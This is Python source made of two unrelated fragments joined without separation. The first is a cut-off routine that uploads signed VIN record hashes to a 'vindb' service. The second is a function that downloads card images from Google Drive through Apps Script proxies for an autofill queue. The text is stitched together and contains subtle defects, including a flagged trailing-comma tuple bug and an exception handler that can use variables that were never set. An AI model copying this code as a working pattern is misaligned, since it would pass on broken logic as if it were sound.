            # Sign the current timestamp to authenticate this batch.
            payload = {
                'signature': blockchain.get_message(
                    datetime.now().strftime('%Y-%m-%dT%H:%M:%S')).sign(
                        settings.vindb_hasher if settings.
                        vindb_use_hasher else settings.vindb_data_source),
                'data_source': settings.vindb_data_source,
                'hashes': records
            }
            if settings.vindb_use_hasher:
                payload['hasher'] = settings.vindb_hasher
            start_time = time.time()
            response = requests_post(
                '{}/vindb/vin_records/create/'.format(settings.vindb_host),
                data=json_dumps(payload),
                headers={'Content-Type': 'application/json'},
                timeout=120)
            extra = {
                'data_source': settings.vindb_data_source,
                'hash_functions': settings.vindb_hash_functions,
                'latest_hashed_id': latest_hashed,
                'latest_id': latest_id,
                'success': response.status_code == 201,
            }
            if response.status_code != 201:
                # error
                # NOTE(review): the trailing comma below makes
                # extra['result'] a 1-tuple, not a string — looks
                # unintended; confirm.
                extra['result'] = json_dumps({
                    'status_code': response.status_code,
                    'response': response.text
                }),
                _logger.error(
                    '%s: %d rows processed unsuccessfully (ids %s-%s). Status code: %s. Error: "%s"',
                    settings.app_name, len(records), records[0]['uuid'],
                    records[-1]['uuid'], response.status_code, response.text,
                    extra=extra)
                raise Exception(
                    'Rows have not been stored in DB. Status code: {}. Error: "{}"'
                    .format(response.status_code, response.text))
            # success
            hashed_records = response.json()['records']
            # check if all records stored in DB
            rs = len(hashed_records) == len(records)
            extra.update({
                'success': rs,
                'hashed_rows': len(hashed_records),
                'hashed_rows_ids': [r['uuid'] for r in hashed_records],
                'tried_hash_rows_ids':
                    [r['uuid'] for r in records] if not rs else None,
                'result': json_dumps({'status_code': response.status_code}),
            })
            if rs:
                _logger.info('%s: %d rows processed successfully (ids %s-%s)',
                             settings.app_name, len(hashed_records),
                             hashed_records[0]['uuid'],
                             hashed_records[-1]['uuid'],
                             extra=extra)
            else:
                if len(hashed_records):
                    _logger.info(
                        '%s: %d of %d rows processed successfully (ids %s-%s)',
                        settings.app_name, len(hashed_records), len(records),
                        hashed_records[0]['uuid'],
                        hashed_records[-1]['uuid'],
                        extra=extra)
                # _logger.error('%s: Not all rows have been stored in DB. '
                #               'Only %d from %d rows processed successfully (ids %s-%s)',
                #               settings.app_name, len(hashed_records), len(records),
                #               hashed_records[0]['uuid'], hashed_records[-1]['uuid'], extra=extra)
                # raise Exception('Not all rows have been created. Status code: {}. Hashed rows ids: "{}". '
                #                 'Tried to hash rows ids: "{}"'.format(response.status_code, extra['hashed_rows_ids'],
                #                                                       extra['tried_hash_rows_ids']))
            _logger.info('--- %s seconds ---', (time.time() - start_time),
                         extra=extra)
    return hashed_rows
def download_card(bar: tqdm, cardinfo):
    """Download one card image from Google Drive (via Apps Script proxies)
    and enqueue it for the autofill pipeline.

    Args:
        bar: shared progress bar, advanced by one at the end.
        cardinfo: sequence of (file_id, slots_text, filename, face).

    Errors never propagate: failed cards are reported on q_error and an
    empty ("", "") item is queued so downstream counting stays aligned.

    Fixes vs. original: removed a garbled stray fragment
    (")) > 0 and text_to_list(...)[0] > 10:") fused into a comment that
    made the function syntactically invalid, and initialised `filename`
    on the name-lookup timeout path (previously unbound -> NameError
    swallowed by the outer except).
    """
    card_item = ("", "")
    try:
        # Retrieve file ID and face from function argument
        file_id = cardinfo[0]
        file_face = cardinfo[3]
        # Attempt to retrieve the filename from function argument (XML)
        try:
            filename = cardinfo[2]
            # An empty filename is treated the same as a missing one.
            if filename == "":
                raise IndexError
        except IndexError:
            # Can't retrieve filename from argument (XML) - retrieve it from a google app query instead
            # Credit to https://tanaikech.github.io/2017/03/20/download-files-without-authorization-from-google-drive/
            # use the results with a 'with' statement to avoid issues w/ connection broken
            try:
                with requests_post(
                    "https://script.google.com/macros/s/AKfycbw90rkocSdppkEuyVdsTuZNslrhd5zNT3XMgfucNMM1JjhLl-Q/exec",
                    data={"id": file_id},
                    timeout=30,
                ) as r_info:
                    filename = r_info.json()["name"]
            except requests_Timeout:
                # Failed to retrieve image name - add it to error queue
                print("cant get filename so gonna exih")
                q_error.put(
                    f"Failed to retrieve filename for image with ID {TEXT_BOLD}{file_id}{TEXT_END} >"
                )
                # Fix: also bind filename so the checks below don't raise
                # NameError on this path.
                filename = ""
        # in the case of file name request failing, filepath will be referenced before assignment unless we do this
        filepath = ""
        if filename:
            # Split the filename on extension and add in the ID as well.
            # Both "name.ext" and "name (ID).ext" are checked, so images
            # downloaded from Drive without renaming still match; the
            # ID-suffixed form is preferred to avoid name clashes.
            filename_split = filename.rsplit(".", 1)
            filename_id = filename_split[0] + " (" + file_id + ")." + filename_split[1]
            # Filepath from filename
            # TODO: os.path.join?
            filepath = cards_folder + "/" + filename
            if not os.path.isfile(filepath) or os.path.getsize(filepath) <= 0:
                # Fall back to the ID-suffixed filename.
                filepath = cards_folder + "/" + filename_id
            # Download the image if it doesn't exist, or exists but is empty
            if (not os.path.isfile(filepath)) or os.path.getsize(filepath) <= 0:
                try:
                    # Up to five attempts, since the API occasionally
                    # returns an empty payload. 120 s timeout per attempt.
                    attempt_counter = 0
                    image_downloaded = False
                    while attempt_counter < 5 and not image_downloaded:
                        with requests_post(
                            "https://script.google.com/macros/s/AKfycbzzCWc2x3tfQU1Zp45LB1P19FNZE-4njwzfKT5_Rx399h-5dELZWyvf/exec",
                            data={"id": file_id},
                            timeout=120,
                        ) as r_contents:
                            # Check if the response returned any data
                            filecontents = r_contents.json()["result"]
                            if len(filecontents) > 0:
                                # Download the image
                                with open(filepath, "bw") as f:
                                    f.write(np_array(filecontents, dtype=np_uint8))
                                image_downloaded = True
                            else:
                                attempt_counter += 1
                    if not image_downloaded:
                        # Never received any data - add to error queue
                        q_error.put(
                            f"{TEXT_BOLD}(unknown){TEXT_END}:\n https://drive.google.com/uc?id={file_id}&export=download"
                        )
                except requests_Timeout:
                    # Failed to download image because of a timeout error - add it to error queue
                    q_error.put(
                        f"{TEXT_BOLD}(unknown){TEXT_END}:\n https://drive.google.com/uc?id={file_id}&export=download"
                    )
        # If the file now exists and is non-empty, queue (filepath, slots);
        # otherwise the empty placeholder keeps downstream counts aligned.
        if os.path.isfile(filepath) and os.path.getsize(filepath) > 0 and filename:
            card_item = (filepath, text_to_list(cardinfo[1]))
    except Exception:
        # Any uncaught error: report and fall through with the empty item
        # so the pipeline never stalls on this card.
        q_error.put(f"https://drive.google.com/uc?id={file_id}&export=download")
    # Add to the appropriate queue
    if file_face == "front":
        q_front.put(card_item)
    elif file_face == "back":
        q_back.put(card_item)
    elif file_face == "cardback":
        q_cardback.put(card_item)
    # Increment progress bar
    bar.update(1)